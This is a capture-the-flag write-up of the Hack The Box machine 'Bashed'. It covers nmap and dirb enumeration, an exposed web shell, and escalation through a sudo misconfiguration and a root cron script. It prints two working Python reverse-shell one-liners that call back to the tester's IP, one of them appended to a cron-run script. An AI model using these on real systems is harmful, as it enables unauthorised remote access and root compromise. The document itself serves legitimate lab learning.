🥊Bashed

#cyber #ctf #hackthebox #writeup #apache #penetration-test #web #common-appliances #Reconnaissance #web-site-structure-discovery #sudo #cron #os-command-injection #code-execution

Information and Loot

Users

  2. scriptmanager

Flags

user: e0ff0c950c7097fff16d4ba2a2836676

root: f7bb617bb6b0529801882332abf95da3

Enumeration

Nmap

nmap -sC -sV -p- -T 4 10.10.11.208 --min-rate 5000
sudo nmap -sS -sC -sV -oA nmap/initial 10.10.10.68 -F -v
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 16:35 AEDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating Ping Scan at 16:35
Scanning 10.10.10.68 [4 ports]
Completed Ping Scan at 16:35, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:35
Completed Parallel DNS resolution of 1 host. at 16:35, 0.00s elapsed
Initiating SYN Stealth Scan at 16:35
Scanning 10.10.10.68 [100 ports]
Discovered open port 80/tcp on 10.10.10.68
Completed SYN Stealth Scan at 16:35, 0.10s elapsed (100 total ports)
Initiating Service scan at 16:35
Scanning 1 service on 10.10.10.68
Completed Service scan at 16:35, 6.04s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.68.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.35s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.05s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Nmap scan report for 10.10.10.68
Host is up (0.016s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
|_http-favicon: Unknown favicon MD5: 6AA5034A553DFA77C3B2C7B4C26CF870
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

NSE: Script Post-scanning.
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Initiating NSE at 16:35
Completed NSE at 16:35, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds
           Raw packets sent: 104 (4.552KB) | Rcvd: 101 (4.044KB)

HTTP

dirb http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov 29 16:42:31 2022
URL_BASE: http://10.10.10.68/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Stopping on warning messages

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.68/ ----
==> DIRECTORY: http://10.10.10.68/css/                                                                            
==> DIRECTORY: http://10.10.10.68/dev/                                                                            
==> DIRECTORY: http://10.10.10.68/fonts/                                                                          
==> DIRECTORY: http://10.10.10.68/images/                                                                         
+ http://10.10.10.68/index.html (CODE:200|SIZE:7743)                                                              
==> DIRECTORY: http://10.10.10.68/js/                                                                             
==> DIRECTORY: http://10.10.10.68/php/                                                                            
+ http://10.10.10.68/server-status (CODE:403|SIZE:299)                                                            
==> DIRECTORY: http://10.10.10.68/uploads/

Contents of /dev are exposed, revealing some interesting files.

Contents of /dev directory

Both of these files give the tester a web shell on the host

Webshell on host

Exploitation

Reverse shell

export RHOST="10.10.14.27";export RPORT=3435;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'
Successsful Reverse Shell

User arrexel's home directory was readable by user www-data user to find user.txt

User Flag

Post Exploitation

Lateral Movement

Checking www-data's sudo privileges there is a misconfiguration allowing the user to execute all commands as the scriptmanager user.

sudo -l
www-data sudo privileges
sudo -u scriptmanager /bin/bash
Lateral movement to scriptmanager user

Privilege Escalation

Using the linpeas.sh script the tester noticed a folder owned by the scriptmanager user /scripts.

Looking at the metadata of the test.txt file, the tester noticed that it had been generated within the last minute. This implies that it was being generated every minute by a scheduled task. the ownership of the test.txt was the root user, meaning that the scheduled task was being run by root.

The tester modified the test.py file to establish a reverse shell by appending the following command to the file.

echo 'import os,pty,socket;s=socket.socket();s.connect(("10.10.14.27",3436));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")' >> test.py
root flag
PreviousMongodNextBoardLight

Last updated